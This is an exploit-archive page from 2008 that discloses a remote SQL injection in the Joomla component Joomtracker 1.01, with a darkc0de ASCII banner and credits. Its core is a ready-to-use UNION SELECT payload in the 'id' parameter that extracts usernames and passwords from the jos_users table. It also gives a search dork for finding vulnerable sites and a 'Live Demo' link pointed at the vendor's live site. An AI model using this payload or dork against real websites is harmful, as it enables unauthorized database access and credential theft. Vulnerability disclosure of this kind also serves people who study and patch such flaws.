[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability
# Published : 2008-10-09
# Author : rsauron
# Previous Title : Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability
# Next Title : Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck #
# and all darkc0de members #
################################################################
#
# Author: rsauron
#
# Home : www.darkc0de.com
#
# Email : rsauron@gmail.com
#
# Share the c0de!
#
################################################################
#
# Type: Joomla Component com_joomtracker Remote SQL Injection Vulnerability
#
# Title: Joomtracker XBT external bittorrent tracker
#
# Vendor: http://www.joomtracker.org/
#
################################################################
#
# d0rk: "Powered by Joomtracker"
#
################################################################
POC :-
index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*
Live Demo:
http://www.joomtracker.org/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*
################################################################
# Bug discovered : 08 Oct.2008
################################################################
# www.Syue.com [2008-10-09]